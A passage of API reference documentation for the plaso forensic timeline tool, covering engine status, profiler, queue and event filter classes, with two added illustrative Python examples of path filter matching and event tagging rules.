        Returns: True if either number of events has increased.
        Return type: bool
        Raises: ValueError – if the consumed or produced number of events is smaller than the value of the previous update.

    UpdateNumberOfExtractionWarnings(number_of_consumed_warnings, number_of_produced_warnings)
        Updates the number of extraction warnings.

        Parameters:
          • number_of_consumed_warnings (int) – total number of extraction warnings consumed by the process.
          • number_of_produced_warnings (int) – total number of extraction warnings produced by the process.
        Returns: True if either number of extraction warnings has increased.
        Return type: bool
        Raises: ValueError – if the consumed or produced number of extraction warnings is smaller than the value of the previous update.

class plaso.engine.processing_status.ProcessingStatus
    Bases: object

    The status of the overall extraction process (processing).

    aborted
        True if processing was aborted. Type: bool
    error_path_specs
        path specifications that caused critical errors during processing. Type: list[dfvfs.PathSpec]
    events_status
        status information about events. Type: EventsStatus
    foreman_status
        foreman process status, as maintained by UpdateForemanStatus. Type: ProcessStatus
    start_time
        time that the processing was started. Contains the number of microseconds since January 1, 1970, 00:00:00 UTC. Type: float
    tasks_status
        status information about tasks. Type: TasksStatus


UpdateEventsStatus(events_status) Updates the events status. Parameters events_status (EventsStatus) – status information about events. UpdateForemanStatus(identifier, status, pid, used_memory, display_name, number_of_consumed_sources, number_of_produced_sources, number_of_consumed_events, number_of_produced_events, number_of_consumed_event_tags, number_of_produced_event_tags, number_of_consumed_reports, number_of_produced_reports, number_of_consumed_warnings, number_of_produced_warnings) Updates the status of the foreman. Parameters • identifier (str) – foreman identifier. • status (str) – human readable status indication such as “Hashing” or “Idle”. • pid (int) – process identifier (PID). • used_memory (int) – size of used memory in bytes. • display_name (str) – human readable of the file entry currently being processed bythe foreman. • number_of_consumed_sources (int) – total number of event sources consumed by the foreman. • number_of_produced_sources (int) – total number of event sources produced by the foreman. • number_of_consumed_events (int) – total number of events consumed by the foreman. • number_of_produced_events (int) – total number of events produced by the foreman. • number_of_consumed_event_tags (int) – total number of event tags consumed by the foreman. • number_of_produced_event_tags (int) – total number of event tags produced by the foreman. • number_of_consumed_warnings (int) – total number of warnings consumed by the foreman. • number_of_produced_warnings (int) – total number of warnings produced by the fore- man. • number_of_consumed_reports (int) – total number of event reports consumed by the process. • number_of_produced_reports (int) – total number of event reports produced by the process. UpdateTasksStatus(tasks_status) Updates the tasks status. Parameters tasks_status (TasksStatus) – status information about tasks.


UpdateWorkerStatus(identifier, status, pid, used_memory, display_name, number_of_consumed_sources, number_of_produced_sources, number_of_consumed_events, number_of_produced_events, number_of_consumed_event_tags, number_of_produced_event_tags, number_of_consumed_reports, number_of_produced_reports, number_of_consumed_warnings, number_of_produced_warnings) Updates the status of a worker. Parameters • identifier (str) – worker identifier. • status (str) – human readable status indication such as “Hashing” or “Idle”. • pid (int) – process identifier (PID). • used_memory (int) – size of used memory in bytes. • display_name (str) – human readable name of the file entry currently being processed by the worker. • number_of_consumed_sources (int) – total number of event sources consumed by the worker. • number_of_produced_sources (int) – total number of event sources produced by the worker. • number_of_consumed_events (int) – total number of events consumed by the worker. • number_of_produced_events (int) – total number of events produced by the worker. • number_of_consumed_event_tags (int) – total number of event tags consumed by the worker. • number_of_produced_event_tags (int) – total number of event tags produced by the worker. • number_of_consumed_reports (int) – total number of event reports consumed by the worker. • number_of_produced_reports (int) – total number of event reports produced by the worker. • number_of_consumed_warnings (int) – total number of warnings consumed by the worker. • number_of_produced_warnings (int) – total number of warnings produced by the worker.
property workers_status The worker status objects sorted by identifier.
class plaso.engine.processing_status.TasksStatus Bases: object The status of the tasks. number_of_abandoned_tasks number of abandoned tasks. Type int number_of_queued_tasks number of active tasks.


Type int number_of_tasks_pending_merge number of tasks pending merge. Type int number_of_tasks_processing number of tasks processing. Type int total_number_of_tasks total number of tasks. Type int plaso.engine.profilers module

The profiler classes. class plaso.engine.profilers.AnalyzersProfiler(identifier, configuration) Bases: plaso.engine.profilers.CPUTimeProfiler The analyzers profiler. class plaso.engine.profilers.CPUTimeMeasurement Bases: object The CPU time measurement. start_sample_time start sample time or None if not set. Type float total_cpu_time total CPU time or None if not set. Type float SampleStart() Starts measuring the CPU time. SampleStop() Stops measuring the CPU time. class plaso.engine.profilers.CPUTimeProfiler(identifier, configuration) Bases: plaso.engine.profilers.SampleFileProfiler The CPU time profiler. StartTiming(profile_name) Starts timing CPU time. Parameters profile_name (str) – name of the profile to sample. StopTiming(profile_name) Stops timing CPU time. Parameters profile_name (str) – name of the profile to sample.

class plaso.engine.profilers.MemoryProfiler(identifier, configuration) Bases: plaso.engine.profilers.SampleFileProfiler The memory profiler. Sample(profile_name, used_memory) Takes a sample for profiling. Parameters • profile_name (str) – name of the profile to sample. • used_memory (int) – amount of used memory in bytes.
class plaso.engine.profilers.ProcessingProfiler(identifier, configuration) Bases: plaso.engine.profilers.CPUTimeProfiler The processing profiler.
class plaso.engine.profilers.SampleFileProfiler(identifier, configuration) Bases: object Shared functionality for sample file-based profilers. classmethod IsSupported() Determines if the profiler is supported. Returns True if the profiler is supported. Return type bool Start() Starts the profiler. Stop() Stops the profiler.
class plaso.engine.profilers.SerializersProfiler(identifier, configuration) Bases: plaso.engine.profilers.CPUTimeProfiler The serializers profiler.
class plaso.engine.profilers.StorageProfiler(identifier, configuration) Bases: plaso.engine.profilers.SampleFileProfiler The storage profiler. Sample(profile_name, operation, description, data_size, compressed_data_size) Takes a sample of data read or written for profiling. Parameters • profile_name (str) – name of the profile to sample. • operation (str) – operation, either ‘read’ or ‘write’. • description (str) – description of the data read or written. • data_size (int) – size of the data in bytes. • compressed_data_size (int) – size of the compressed data in bytes. StartTiming(profile_name) Starts timing CPU time. Parameters profile_name (str) – name of the profile to sample.


StopTiming(profile_name) Stops timing CPU time. Parameters profile_name (str) – name of the profile to sample. class plaso.engine.profilers.TaskQueueProfiler(identifier, configuration) Bases: plaso.engine.profilers.SampleFileProfiler The task queue profiler. Sample(tasks_status) Takes a sample of the status of queued tasks for profiling. Parameters tasks_status (TasksStatus) – status information about tasks. class plaso.engine.profilers.TasksProfiler(identifier, configuration) Bases: plaso.engine.profilers.SampleFileProfiler The tasks profiler. Sample(task, status) Takes a sample of the status of a task for profiling. Parameters • task (Task) – a task. • status (str) – status.

plaso.engine.tagging_file module

Tagging file. class plaso.engine.tagging_file.TaggingFile(path) Bases: object Tagging file that defines one or more event tagging rules. GetEventTaggingRules() Retrieves the event tagging rules from the tagging file. Returns tagging rules, that consists of one or more filter objects per label. Return type dict[str, EventObjectFilter] Raises TaggingFileError – if a filter expression cannot be compiled.

plaso.engine.worker module

The event extraction worker.
class plaso.engine.worker.EventExtractionWorker(force_parser=False, parser_filter_expression=None) Bases: object Event extraction worker. The event extraction worker determines which parsers are suitable for parsing a particular file entry or data stream. The parsers extract relevant data from file system and/or file content data. All extracted data is passed to the parser mediator for further processing. last_activity_timestamp timestamp received that indicates the last time activity was observed.


Type int processing_status human readable status indication such as: ‘Extracting’, ‘Hashing’. Type str GetAnalyzerNames() Gets the names of the active analyzers. Returns names of active analyzers. Return type list[str] ProcessPathSpec(mediator, path_spec, excluded_find_specs=None) Processes a path specification. Parameters • mediator (ParserMediator) – mediates the interactions between parsers and other com- ponents, such as storage and abort signals. • path_spec (dfvfs.PathSpec) – path specification. • excluded_find_specs (Optional[list[dfvfs.FindSpec]]) – find specifications that are excluded from processing. SetAnalyzersProfiler(analyzers_profiler) Sets the analyzers profiler. Parameters analyzers_profiler (AnalyzersProfiler) – analyzers profile. SetExtractionConfiguration(configuration) Sets the extraction configuration settings. Parameters configuration (ExtractionConfiguration) – extraction configuration. SetProcessingProfiler(processing_profiler) Sets the processing profiler. Parameters processing_profiler (ProcessingProfiler) – processing profile. SignalAbort() Signals the extraction worker to abort. plaso.engine.yaml_filter_file module

YAML-based filter file.
class plaso.engine.yaml_filter_file.YAMLFilterFile Bases: object YAML-based filter file. A YAML-based filter file contains one or more path filters, for example:

    description: Include filter with Linux paths.
    type: include
    path_separator: '/'
    paths:
    - '/usr/bin'

Where: • description, is an optional description of the purpose of the path filter; • type, defines the filter type, which can be “include” or “exclude”; • path_separator, defines the path segment separator, which is “/” by default; • paths, defines the regular expressions of the paths to filter on. Note that the regular expression needs to be defined per path segment; for example, to filter both “/usr/bin/echo” and “/usr/sbin/echo” the expression “/usr/(bin|sbin)/echo” could be defined.


Note that when the path segment separator is defined as “\” it needs to be escaped as “\\” in the path expressions, since “\” is used by the regular expression as an escape character. A path may contain path expansion attributes, for example: %{SystemRoot}\System32
ReadFromFile(path) Reads the path filters from the YAML-based filter file. Parameters path (str) – path to a filter file. Returns path filters. Return type list[PathFilter]
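The per-segment matching rule above is the detail most often misread: a filter path is a sequence of regular expressions, one per path segment, so “/etc/.*” selects “/etc/passwd” but not “/etc/ssh/sshd_config”, and a backslash separator has to be written as “\\” inside the filter text. The following added example (illustrative code, not plaso's YAMLFilterFile or PathFilter implementation) applies include and exclude filters with these semantics. The filter dictionaries mirror the YAML keys shown above and stand in for what ReadFromFile() would load; the candidate paths and the %{SystemRoot} expansion value are constructed for the example.

```python
import re

# Constructed filter definitions that mirror the keys of the YAML filter file
# described above (type, path_separator, paths). They stand in for what
# YAMLFilterFile.ReadFromFile() would load; the matching below illustrates
# the per-segment semantics and is not plaso's implementation.
LINUX_FILTER = {
    "type": "include",
    "path_separator": "/",
    "paths": ["/usr/(bin|sbin)/echo", "/etc/.*"],
}
WINDOWS_FILTER = {
    "type": "include",
    "path_separator": "\\",
    # With a backslash separator every separator in a filter path is written
    # as the two characters "\\", since a lone "\" is a regex escape.
    "paths": [r"%{SystemRoot}\\System32\\.*\.dll"],
}
# Constructed value for the %{SystemRoot} path expansion attribute, written
# in the same escaped form as the filter paths.
ENVIRONMENT = {"SystemRoot": r"\\Windows"}

# Constructed candidate paths, as a collector would encounter them.
LINUX_PATHS = ["/usr/bin/echo", "/usr/sbin/echo", "/usr/bin/env",
               "/etc/passwd", "/etc/ssh/sshd_config"]
WINDOWS_PATHS = [r"\Windows\System32\ntdll.dll",
                 r"\Windows\System32\drivers\http.sys",
                 r"\Users\alice\ntdll.dll"]


def _compile_segments(filter_path, separator, environment):
    """Expands %{name} attributes, then compiles one regex per path segment."""
    def expand(match):
        name = match.group(1)
        if name not in environment:
            raise ValueError("unknown path expansion attribute: " + name)
        return environment[name]
    expanded = re.sub(r"%\{(\w+)\}", expand, filter_path)
    # In the filter text a backslash separator appears as the escaped pair "\\".
    text_separator = "\\\\" if separator == "\\" else separator
    return [re.compile(segment) for segment in expanded.split(text_separator)]


def _segments_match(compiled_segments, path, separator):
    """A path matches only if it has as many segments as the filter and every
    segment fully matches its own regex, which is why "/etc/.*" selects
    "/etc/passwd" but not "/etc/ssh/sshd_config"."""
    path_segments = path.split(separator)
    if len(path_segments) != len(compiled_segments):
        return False
    return all(regex.fullmatch(segment) is not None
               for regex, segment in zip(compiled_segments, path_segments))


def matching_paths(path_filter, candidate_paths, environment=None):
    """Applies one include or exclude path filter and returns the candidate
    paths that survive it, in their original order."""
    separator = path_filter.get("path_separator", "/")
    compiled = [_compile_segments(p, separator, environment or {})
                for p in path_filter["paths"]]

    def selected(path):
        return any(_segments_match(c, path, separator) for c in compiled)

    if path_filter["type"] == "include":
        return [p for p in candidate_paths if selected(p)]
    if path_filter["type"] == "exclude":
        return [p for p in candidate_paths if not selected(p)]
    raise ValueError("filter type must be include or exclude")


if __name__ == "__main__":
    print(matching_paths(LINUX_FILTER, LINUX_PATHS))
    print(matching_paths(WINDOWS_FILTER, WINDOWS_PATHS, ENVIRONMENT))
```

Run with the constructed inputs, the Linux include filter keeps both echo binaries and /etc/passwd but drops /etc/ssh/sshd_config, and the Windows filter keeps only ntdll.dll directly under System32; an exclude filter on “/etc/.*” likewise leaves the deeper sshd_config in place, so a filter meant to cover a whole subtree needs one expression per depth.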

plaso.engine.zeromq_queue module

ZeroMQ implementations of the Plaso queue interface.
class plaso.engine.zeromq_queue.ZeroMQBufferedQueue(buffer_timeout_seconds=2, buffer_max_size=10000, delay_open=True, linger_seconds=10, maximum_items=1000, name='Unnamed', port=None, timeout_seconds=5) Bases: plaso.engine.zeromq_queue.ZeroMQQueue Parent class for buffered Plaso queues. Buffered queues use a regular Python queue to store items that are pushed or popped from the queue without blocking on underlying ZeroMQ operations. This class should not be instantiated directly, a subclass should be instantiated instead. Close(abort=False) Closes the queue. Parameters abort (Optional[bool]) – whether the Close is the result of an abort condition. If True, queue contents may be lost. Raises • QueueAlreadyClosed – if the queue is not started, or has already been closed. • RuntimeError – if closed or terminate event is missing. Empty() Removes all items from the internal buffer.
class plaso.engine.zeromq_queue.ZeroMQBufferedReplyBindQueue(buffer_timeout_seconds=2, buffer_max_size=10000, delay_open=True, linger_seconds=10, maximum_items=1000, name='Unnamed', port=None, timeout_seconds=5) Bases: plaso.engine.zeromq_queue.ZeroMQBufferedReplyQueue A Plaso queue backed by a ZeroMQ REP socket that binds to a port. Like its parent class, this queue may only be used to push items, not to pop (PopItem raises WrongQueueType). SOCKET_CONNECTION_TYPE = 1


class plaso.engine.zeromq_queue.ZeroMQBufferedReplyQueue(buffer_timeout_seconds=2, buffer_max_size=10000, delay_open=True, linger_seconds=10, maximum_items=1000, name='Unnamed', port=None, timeout_seconds=5) Bases: plaso.engine.zeromq_queue.ZeroMQBufferedQueue Parent class for buffered Plaso queues backed by ZeroMQ REP sockets. This class should not be instantiated directly, a subclass should be instantiated instead. Instances of this class or subclasses may only be used to push items, not to pop. PopItem() Pops an item off the queue. Provided for compatibility with the API, but doesn’t actually work. Raises WrongQueueType – as Pop is not supported by this queue. PushItem(item, block=True) Pushes an item on to the queue. If no ZeroMQ socket has been created, one will be created the first time this method is called. Parameters • item (object) – item to push on the queue. • block (Optional[bool]) – whether the push should be performed in blocking or non-blocking mode. Raises • QueueAlreadyClosed – if the queue is closed. • QueueFull – if the internal buffer was full and it was not possible to push the item to the buffer within the timeout. • RuntimeError – if closed event is missing.
class plaso.engine.zeromq_queue.ZeroMQPullConnectQueue(delay_open=True, linger_seconds=10, maximum_items=1000, name='Unnamed', port=None, timeout_seconds=5) Bases: plaso.engine.zeromq_queue.ZeroMQPullQueue A Plaso queue backed by a ZeroMQ PULL socket that connects to a port. This queue may only be used to pop items, not to push. SOCKET_CONNECTION_TYPE = 2
class plaso.engine.zeromq_queue.ZeroMQPullQueue(delay_open=True, linger_seconds=10, maximum_items=1000, name='Unnamed', port=None, timeout_seconds=5) Bases: plaso.engine.zeromq_queue.ZeroMQQueue Parent class for Plaso queues backed by ZeroMQ PULL sockets. This class should not be instantiated directly, a subclass should be instantiated instead. Instances of this class or subclasses may only be used to pop items, not to push.
PopItem() Pops an item off the queue.


If no ZeroMQ socket has been created, one will be created the first time this method is called. Returns item from the queue. Return type object Raises • KeyboardInterrupt – if the process is sent a KeyboardInterrupt while popping an item. • QueueEmpty – if the queue is empty, and no item could be popped within the queue timeout. • RuntimeError – if closed or terminate event is missing. • zmq.error.ZMQError – if a ZeroMQ error occurs. PushItem(item, block=True) Pushes an item on to the queue. Provided for compatibility with the API, but doesn’t actually work. Parameters • item (object) – item to push on the queue. • block (Optional[bool]) – whether the push should be performed in blocking or non-blocking mode. Raises WrongQueueType – as Push is not supported by this queue.
class plaso.engine.zeromq_queue.ZeroMQPushBindQueue(delay_open=True, linger_seconds=10, maximum_items=1000, name='Unnamed', port=None, timeout_seconds=5) Bases: plaso.engine.zeromq_queue.ZeroMQPushQueue A Plaso queue backed by a ZeroMQ PUSH socket that binds to a port. This queue may only be used to push items, not to pop. SOCKET_CONNECTION_TYPE = 1
class plaso.engine.zeromq_queue.ZeroMQPushQueue(delay_open=True, linger_seconds=10, maximum_items=1000, name='Unnamed', port=None, timeout_seconds=5) Bases: plaso.engine.zeromq_queue.ZeroMQQueue Parent class for Plaso queues backed by ZeroMQ PUSH sockets. This class should not be instantiated directly, a subclass should be instantiated instead. Instances of this class or subclasses may only be used to push items, not to pop. PopItem() Pops an item off the queue. Provided for compatibility with the API, but doesn’t actually work. Raises WrongQueueType – as Pop is not supported by this queue. PushItem(item, block=True) Pushes an item on to the queue. If no ZeroMQ socket has been created, one will be created the first time this method is called. Parameters • item (object) – item to push on the queue.


• block (Optional[bool]) – whether the push should be performed in blocking or non-blocking mode. Raises • KeyboardInterrupt – if the process is sent a KeyboardInterrupt while pushing an item. • QueueFull – if it was not possible to push the item to the queue within the timeout. • RuntimeError – if terminate event is missing. • zmq.error.ZMQError – if a ZeroMQ specific error occurs.
class plaso.engine.zeromq_queue.ZeroMQQueue(delay_open=True, linger_seconds=10, maximum_items=1000, name='Unnamed', port=None, timeout_seconds=5) Bases: plaso.engine.plaso_queue.Queue Interface for a ZeroMQ backed queue. name name to identify the queue. Type str port TCP port that the queue is connected or bound to. If the queue is not yet bound or connected to a port, this value will be None. Type int timeout_seconds number of seconds that calls to PopItem and PushItem may block for before raising QueueEmpty or QueueFull respectively. Type int Close(abort=False) Closes the queue. Parameters abort (Optional[bool]) – whether the Close is the result of an abort condition. If True, queue contents may be lost. Raises • QueueAlreadyClosed – if the queue is not started, or has already been closed. • RuntimeError – if closed or terminate event is missing. IsBound() Checks if the queue is bound to a port. IsConnected() Checks if the queue is connected to a port. IsEmpty() Checks if the queue is empty. ZeroMQ queues don’t have a concept of “empty” - there could always be messages on the queue that a producer or consumer is unaware of. Thus, the queue is never empty, so we return False. Note that it is possible that a queue is unable to pop an item from a queue within a timeout, which will cause PopItem to raise a QueueEmpty exception, but this is a different condition. Returns False, to indicate that the queue isn’t empty. Return type bool


Open() Opens this queue, causing the creation of a ZeroMQ socket. Raises QueueAlreadyStarted – if the queue is already started, and a socket already exists. abstract PopItem() Pops an item off the queue. Returns item from the queue. Return type object Raises QueueEmpty – if the queue is empty, and no item could be popped within the queue timeout. abstract PushItem(item, block=True) Pushes an item on to the queue. Parameters • item (object) – item to push on the queue. • block (Optional[bool]) – whether the push should be performed in blocking or non- blocking mode. Raises QueueAlreadyClosed – if the queue is closed. SOCKET_CONNECTION_BIND = 1 SOCKET_CONNECTION_CONNECT = 2 SOCKET_CONNECTION_TYPE = None class plaso.engine.zeromq_queue.ZeroMQRequestConnectQueue(delay_open=True, linger_seconds=10, maximum_items=1000, name='Unnamed', port=None, timeout_seconds=5) Bases: plaso.engine.zeromq_queue.ZeroMQRequestQueue A Plaso queue backed by a ZeroMQ REQ socket that connects to a port. This queue may only be used to pop items, not to push. SOCKET_CONNECTION_TYPE = 2 class plaso.engine.zeromq_queue.ZeroMQRequestQueue(delay_open=True, linger_seconds=10, maximum_items=1000, name='Unnamed', port=None, timeout_seconds=5) Bases: plaso.engine.zeromq_queue.ZeroMQQueue Parent class for Plaso queues backed by ZeroMQ REQ sockets. This class should not be instantiated directly, a subclass should be instantiated instead. Instances of this class or subclasses may only be used to pop items, not to push. PopItem() Pops an item off the queue. If no ZeroMQ socket has been created, one will be created the first time this method is called. Returns item from the queue. Return type object Raises


• KeyboardInterrupt – if the process is sent a KeyboardInterrupt while popping an item. • QueueEmpty – if the queue is empty, and no item could be popped within the queue timeout. • RuntimeError – if terminate event is missing. • zmq.error.ZMQError – if an error occurs in ZeroMQ. PushItem(item, block=True) Pushes an item on to the queue. Provided for compatibility with the API, but doesn’t actually work. Parameters • item (object) – item to push on the queue. • block (Optional[bool]) – whether the push should be performed in blocking or non-blocking mode. Raises WrongQueueType – as Push is not supported by this queue.

Module contents

5.1.6 plaso.filters package

Submodules plaso.filters.event_filter module

The event filter. class plaso.filters.event_filter.EventObjectFilter Bases: object Event filter. CompileFilter(filter_expression) Compiles the filter expression. The filter expression contains an object filter expression. Parameters filter_expression (str) – filter expression. Raises ParseError – if the filter expression cannot be parsed. Match(event, event_data, event_data_stream, event_tag) Determines if an event matches the filter. Parameters • event (EventObject) – event. • event_data (EventData) – event data. • event_data_stream (EventDataStream) – event data stream. • event_tag (EventTag) – event tag. Returns True if the event matches the filter, False otherwise. Return type bool

plaso.filters.expression_parser module

Event filter expression parser.
class plaso.filters.expression_parser.EventFilterExpressionParser Bases: object Event filter expression parser. Examples of valid syntax:

    size is 40
    (name contains “Program Files” AND hash.md5 is “123abc”)
    @imported_modules (num_symbols = 14 AND symbol.name is “FindWindow”)

HexEscape(string, match, **unused_kwargs) Converts a hex escaped string. Note that this function is used as a callback by _GetNextToken. Returns next state, which is None. Return type str Raises ParseError – if the string is not hex escaped. Parse(expression) Parses an event filter expression. Parameters expression (str) – event filter expression. Returns expression. Return type Expression
class plaso.filters.expression_parser.Token(state, regex, actions, next_state) Bases: object An event filter expression parser token. actions list of method names in the EventFilterExpressionParser to call. Type list[str] next_state next state we transition to if this Token matches. Type str state parser state in which the token should be applied, or None if the token should be applied regardless of the parser state. Type str CompareExpression(expression) Compares the token against an expression string. Parameters expression (str) – expression string. Returns the regular expression match object if the expression string matches the token or None if no match. Return type re.Match
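EventObjectFilter.CompileFilter() turns an expression such as the second example above into a tree of the filter classes documented in plaso.filters.filters below (AndFilter, Contains, EqualsOperator, Regexp and GenericBinaryOperator.FlipBool), and TaggingFile.GetEventTaggingRules() hands such trees back as a dict of label to filters. The following added example (not plaso's parser or filter classes) builds that tree by hand for `name contains “Program Files” AND hash.md5 is “123abc”` and evaluates it through the Match(event, event_data, event_data_stream, event_tag) interface as tagging rules. The _Object stand-ins, the attribute lookup order, the treatment of a missing attribute and the sample event are all assumptions or constructed for the example.

```python
import re


class _Object:
    """Constructed stand-in for plaso's EventObject, EventData,
    EventDataStream and EventTag: a plain bag of attributes."""
    def __init__(self, **attributes):
        self.__dict__.update(attributes)


def _resolve(attribute, event, event_data, event_data_stream, event_tag):
    """Resolves a dotted attribute such as "hash.md5" against the objects
    Match() receives; "tag" resolves to the tag's labels. The lookup order
    (event data, data stream, then event) is an assumption of this example."""
    head, _, rest = attribute.partition(".")
    if head == "tag":
        value = getattr(event_tag, "labels", None)
    else:
        value = None
        for obj in (event_data, event_data_stream, event):
            value = getattr(obj, head, None)
            if value is not None:
                break
    for part in (rest.split(".") if rest else []):
        value = getattr(value, part, None)
    return value


class Filter:
    """Filter interface: args holds the operands, Matches() yields a bool."""
    def __init__(self, *arguments):
        self.args = list(arguments)


class AndFilter(Filter):
    """Boolean AND of the argument filters; with no arguments everything passes."""
    def Matches(self, *objects):  # objects = (event, event_data, stream, tag)
        return all(arg.Matches(*objects) for arg in self.args)


class GenericBinaryOperator(Filter):
    """Compares the attribute named in args[0] with the literal in args[1]."""
    def __init__(self, attribute, operand):
        super().__init__(attribute, operand)
        self._bool_value = True  # FlipBool() turns "is" into "is not", etc.

    def FlipBool(self):
        self._bool_value = not self._bool_value

    def Operation(self, value, operand):
        raise NotImplementedError

    def Matches(self, *objects):
        value = _resolve(self.args[0], *objects)
        if value is None:  # a missing attribute never matches (assumption here)
            return False
        return self.Operation(value, self.args[1]) == self._bool_value


class EqualsOperator(GenericBinaryOperator):
    def Operation(self, value, operand):
        return value == operand


class Contains(GenericBinaryOperator):
    """Substring test on strings, membership test on lists such as labels."""
    def Operation(self, value, operand):
        return operand in value


class Regexp(GenericBinaryOperator):
    def Operation(self, value, operand):
        return re.search(operand, str(value)) is not None


def tagging_rules():
    """Constructed rules in the shape GetEventTaggingRules() returns: a label
    mapped to filter objects; any one of them matching assigns the label."""
    return {
        "program_files_binary": [AndFilter(Contains("name", "Program Files"),
                                           EqualsOperator("hash.md5", "123abc"))],
        "size_is_40": [EqualsOperator("size", 40)],
        "already_triaged": [Contains("tag", "triage")],
        "system32_dll": [Regexp("name", r"\\Windows\\System32\\[^\\]+\.dll$")],
    }


def tag_event(rules, event, event_data, event_data_stream, event_tag):
    """Returns the sorted labels whose rules match the given event."""
    return sorted(label for label, filters in rules.items()
                  if any(f.Matches(event, event_data, event_data_stream, event_tag)
                         for f in filters))


def sample_event():
    """Constructed event objects; not taken from any real evidence."""
    event = _Object(timestamp=1622985600000000, timestamp_desc="Creation Time")
    event_data = _Object(data_type="fs:stat", size=40,
                         name=r"C:\Program Files\Tool\tool.exe",
                         hash=_Object(md5="123abc"))
    return event, event_data, _Object(), _Object(labels=["triage"])
```

tag_event(tagging_rules(), *sample_event()) yields already_triaged, program_files_binary and size_is_40; the same tree with FlipBool() applied to the size operator, or an operator on an attribute the event lacks (such as hash.sha256), matches nothing, which is the behaviour to keep in mind when a tagging rule written as a negation silently skips events that never carried the attribute.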

plaso.filters.expressions module

The event filter expression parser expression classes.
class plaso.filters.expressions.BinaryExpression(operator='') Bases: plaso.filters.expressions.Expression An event filter parser expression which takes two other expressions. AddOperands(lhs, rhs) Adds the operands. Parameters • lhs (Expression) – left hand side expression. • rhs (Expression) – right hand side expression. Raises ParseError – if either left hand side or right hand side expression is not an instance of Expression. Compile() Compiles the expression into a filter. Returns filter object corresponding to the expression. Return type Filter Raises ParseError – if the operator is not supported. __repr__() Retrieves a string representation of the object for debugging.
class plaso.filters.expressions.EventExpression Bases: plaso.filters.expressions.Expression Event expression. Compile() Compiles the expression into a filter. Returns filter object corresponding to the expression. Return type Filter Raises ParseError – if the operator is missing or unknown. Negate() Reverses the logic of (negates) the expression. __repr__() Retrieves a string representation of the object for debugging.
class plaso.filters.expressions.Expression Bases: object An event filter parser expression. attribute attribute or None if not set. Type str args arguments. Type list[object]


number_of_args expected number of arguments. Type int operator operator or None if not set. Type str AddArgument(argument) Adds a new argument to this expression. Parameters argument (object) – argument to add. Returns True if the argument is the last argument, False otherwise. Return type bool Raises ParseError – if there are too many arguments. abstract Compile() Compiles the expression into a filter. Returns filter object corresponding to the expression. Return type Filter SetAttribute(attribute) Sets the attribute. Parameters attribute (str) – attribute, or None if not set. SetOperator(operator) Sets the operator. Parameters operator (str) – operator, such as “and” or “&&”, or None if not set. attribute = None
class plaso.filters.expressions.IdentityExpression Bases: plaso.filters.expressions.Expression An event filter parser expression which always evaluates to True. Compile() Compiles the expression into a filter. Returns filter object which always evaluates to True. Return type IdentityFilter
plaso.filters.file_entry module

File entry filters. class plaso.filters.file_entry.DateTimeFileEntryFilter Bases: plaso.filters.file_entry.FileEntryFilter Date and time-based file entry filter. AddDateTimeRange(time_value, start_time_string=None, end_time_string=None) Adds a date time filter range.


The time strings are formatted as: YYYY-MM-DD hh:mm:ss.######[+-]##:## where # are numeric digits ranging from 0 to 9 and the seconds fraction can be either 3 or 6 digits. The time of day, seconds fraction and timezone offset are optional. The default timezone is UTC. Parameters • time_value (str) – time value, such as atime, ctime, crtime, dtime, bkup and mtime. • start_time_string (str) – start date and time value string. • end_time_string (str) – end date and time value string. Raises ValueError – if the filter is badly formed. Matches(file_entry) Compares the file entry against the filter. Parameters file_entry (dfvfs.FileEntry) – file entry to compare. Returns True if the file entry matches the filter, False if not, or None if the filter does not apply. Return type bool Print(output_writer) Prints a human readable version of the filter. Parameters output_writer (CLIOutputWriter) – output writer.
class plaso.filters.file_entry.ExtensionsFileEntryFilter(extensions) Bases: plaso.filters.file_entry.FileEntryFilter Extensions-based file entry filter. Matches(file_entry) Compares the file entry against the filter. Parameters file_entry (dfvfs.FileEntry) – file entry to compare. Returns True if the file entry matches the filter, False if not, or None if the filter does not apply. Return type bool Print(output_writer) Prints a human readable version of the filter. Parameters output_writer (CLIOutputWriter) – output writer.
class plaso.filters.file_entry.FileEntryFilter Bases: object File entry filter interface. abstract Matches(file_entry) Compares the file entry against the filter. Parameters file_entry (dfvfs.FileEntry) – file entry to compare. Returns True if the file entry matches the filter, False if not, or None if the filter does not apply. Return type bool


abstract Print(output_writer) Prints a human readable version of the filter. Parameters output_writer (CLIOutputWriter) – output writer.
class plaso.filters.file_entry.FileEntryFilterCollection Bases: object Collection of file entry filters. AddFilter(file_entry_filter) Adds a file entry filter to the collection. Parameters file_entry_filter (FileEntryFilter) – file entry filter. HasFilters() Determines if filters are defined. Returns True if filters are defined. Return type bool Matches(file_entry) Compares the file entry against the filter collection. Parameters file_entry (dfvfs.FileEntry) – file entry to compare. Returns True if the file entry matches one of the filters. If no filters are provided or applicable the result will be True. Return type bool Print(output_writer) Prints a human readable version of the filter. Parameters output_writer (CLIOutputWriter) – output writer.
class plaso.filters.file_entry.NamesFileEntryFilter(names) Bases: plaso.filters.file_entry.FileEntryFilter Names-based file entry filter. Matches(file_entry) Compares the file entry against the filter. Parameters file_entry (dfvfs.FileEntry) – file entry to compare. Returns True if the file entry matches the filter. Return type bool Print(output_writer) Prints a human readable version of the filter. Parameters output_writer (CLIOutputWriter) – output writer.
class plaso.filters.file_entry.SignaturesFileEntryFilter(specification_store, signature_identifiers) Bases: plaso.filters.file_entry.FileEntryFilter Signature-based file entry filter. Matches(file_entry) Compares the file entry against the filter. Parameters file_entry (dfvfs.FileEntry) – file entry to compare.


Returns True if the file entry matches the filter, False if not, or None if the filter does not apply. Return type bool Print(output_writer) Prints a human readable version of the filter. Parameters output_writer (CLIOutputWriter) – output writer.
plaso.filters.filters module

The event filter expression parser filter classes. class plaso.filters.filters.AndFilter(arguments=None) Bases: plaso.filters.filters.Filter A filter that performs a boolean AND on the arguments. Note that if no conditions are passed, all objects will pass. Matches(event, event_data, event_data_stream, event_tag) Determines if the event, data and tag match the filter. Parameters • event (EventObject) – event to compare against the filter. • event_data (EventData) – event data to compare against the filter. • event_data_stream (EventDataStream) – event data stream. • event_tag (EventTag) – event tag to compare against the filter. Returns True if the event, data and tag match the filter, False otherwise. Return type bool class plaso.filters.filters.BinaryOperator(arguments=None, **kwargs) Bases: plaso.filters.filters.Operator Interface for binary operators. left_operand left hand operand. Type object right_operand right hand operand. Type object abstract Matches(event, event_data, event_data_stream, event_tag) Determines if the event, data and tag match the filter. Parameters • event (EventObject) – event to compare against the filter. • event_data (EventData) – event data to compare against the filter. • event_data_stream (EventDataStream) – event data stream. • event_tag (EventTag) – event tag to compare against the filter.


